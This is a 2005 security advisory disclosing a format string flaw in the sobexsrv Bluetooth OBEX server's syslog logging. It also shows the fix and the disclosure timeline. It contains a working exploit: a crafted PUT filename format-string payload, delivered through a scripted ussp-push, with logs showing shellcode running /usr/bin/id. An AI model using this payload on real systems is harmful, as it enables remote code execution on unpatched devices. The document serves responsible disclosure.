DMA[2005-1202a] - 'sobexsrv - Scripting/Secure OBEX Server format string vulnerability' Author: Kevin Finisterre Vendor: http://www.mulliner.org/bluetooth/sobexsrv.php Product: 'sobexsrv' References: http://www.digitalmunition.com/DMA[2005-1202a].txt http://www.mulliner.org/bluetooth/sobexsrv-1.0.0_pre3.tar.gz Description: The trifinite.blog is a weblog that is maintained by the trifinite.group. Every now and then you will find new entries there... Over Turkey Day I noticed a blog entry about a 'not really security related but very useful' Bluetooth application from the trifinite.group. There were actually two new applications but one jumped out at me right away. One of the apps needed hardware I did not have so I did not pay much attention to it, sobexsrv however seemed interesting. sobexsrv is a Bluetooth OBEX server with Bluetooth Security Mode-2 (application triggered security) support. It implements OPUSH (put), OPULL (get) and OBEX-FTP (setpath + directory listing) and therefore is a full OBEX server. sobexsrv was designed with flexibility and security in mind... Since I truely think Trifinite is pretty hardcore I almost didn't bother looking for bugs in this daemon. I pretty much assumed it would be rock solid. I figured if you can whisper at cars and shit you can certainly write an OBEX server. Being lazy I assumed that the examples from the man pages were easy enough to get me started using the sobexsrv. I quickly found that the first 2 man page examples can be used as examples for triggering a format string issue. EXAMPLES Simple setup using the internal mode, logging with syslog(8) and INBOX in /tmp. sobexsrv -IS -r /tmp Simple secure setup with chroot and Bluetooth security mode-2. sobexsrv -s 2 -ISR -l X -r /tmp In both examples shown above the -S option is used to enable syslog() logging. A format string issue was located almost immediately in the syslog support for the logging functions. Several instances of user input are passed to an unformatted syslog() call when using dosyslog(). kfinisterre@animosity:~/sobexsrv-1.0.0_pre3$ grep syslog\( . -rin ./src/obexsrv.c:58: void dosyslog(char *m1, void *m2, void *m3) ./src/obexsrv.c:71: syslog(LOG_INFO, log); ... ./src/obexsrv.c:203: dosyslog("folder listing for \"%s\"\n", path, 0); ./src/obexsrv.c:290: if (ret) dosyslog("pulling \"%s\"\n", fullpath, 0); ./src/obexsrv.c:291: else dosyslog("failed pulling \"%s\"\n", fullpath, 0); ./src/obexsrv.c:334: if (ret) dosyslog("pushing \"%s\"\n", fullpath, 0); ./src/obexsrv.c:335: else dosyslog("faild pushing \"%s\"\n", fullpath, 0); ./src/obexsrv.c:356: if (ret) dosyslog("deleting \"%s\"\n", fullpath, 0); ./src/obexsrv.c:357: else dosyslog("failed deleting \"%s\"\n", fullpath, 0); ./src/obexsrv.c:401: dosyslog("created directory \"%s\"\n", fullpath, 0); ./src/obexsrv.c:406: dosyslog("failed to create directory \"%s\"\n", fullpath, 0); ... As an example I used a windows machine with the Widcomm bluetooth stack to create a folder named "--AAAABBBB%19$x.%20$x" on a remote host. The My Bluetooth Places icon provides an OBEX ftp interface which worked perfect for a quick verification of the bug. Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connecting... Nov 24 04:24:40 sobexsrv: [00:0A:3A:54:71:95] connected Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] folder listing for "/tmp" Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] created directory "/tmp//---AAAABBBB41414141.42424242" Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnecting... Nov 24 04:24:41 sobexsrv: [00:0A:3A:54:71:95] disconnected The host in this example is a PowerPC linux box so keep in mind that the x86 offsets will differ. This vulnerability is pretty trivial to exploit as shown below. We run the server in debug mode so that we can see what is going on a little better. Then we exploit it with a scripted ussp-push. kfinisterre@threat:~$ sobexsrv -ISd -r /home/kfinisterre/ security: mode = 1 REQHINT - add handler for this! CONNECT start CONNECT ok, result = 1 CONNECT end REQDONE REQHINT - add handler for this! PUT start PUT name: %1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA PUT length: 201 PUT body length: 201 PUT data_type 1 internal_handler: put for "/home/kfinisterre//%1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" length=201 PUT ok PUT end REQDONE REQHINT - add handler for this! DISCONNECT start DISCONNECT end uid=1000(kfinisterre) gid=1000(kfinisterre) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre) As you can see we were able to deliver a /bin/sh payload and have the daemon run /usr/bin/id for us. This is what things look like from the attackers point of view. animosity:/home/kfinisterre/ussp-push-0.4# ./sobexsrv.pl pushing file /tmp/shellcode name=/tmp/shellcode, size=201 Registered transport set user data created new objext Local device 00:11:B1:07:BE:A7 Remote device 00:0B:0D:63:0B:CC (1) started a new request reqdone Command (00) has now finished, rsp: 20Connected! Connection return code: 0, id: 0 Connection established connected to server Sending file: %1997.d%27$hn%76819.d%28$hnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, path: /tmp/shellcode, size: 201 reqdone Command (02) has now finished, rsp: 20reqdone Command (01) has now finished, rsp: 20Disconnect done!pushed!! Workaround: The Author issued the following temporary warning before patching the problem. "the syslog (-S) function of sobexsrv is vulerable to a formatstring attack and therefore should not be used as of now!" Fixed versions are available at the following locations. http://www.mulliner.org/bluetooth/sobexsrv-1.0.0pre4.tar.gz http://www.mulliner.org/bluetooth/sobexsrv_1.0.0pre4-1_i386.deb http://www.mulliner.org/nokia770/feed/sobexsrv_1.0.0pre4-1_arm.deb (maemo binary) Note: This is honestly not that critical of an issue, however it was a fun bug to exploit and it helps satisfy my Bluetooth fetish. In reality only a handfull of Nokia 770 Tablet PC users and perhaps a few trifinite.blog users are affected by this issue. Collin made sure this was taken care of very promptly. Timeline associated with this bug: 11/03/2005 sobexsrv to trifinite.blog posted by Collin Mulliner 11/23/2005 Turkey Day boredom sets in ... email collin about the find. 11/25/2005 sobexsrv-1.0.0pre4.tar.gz released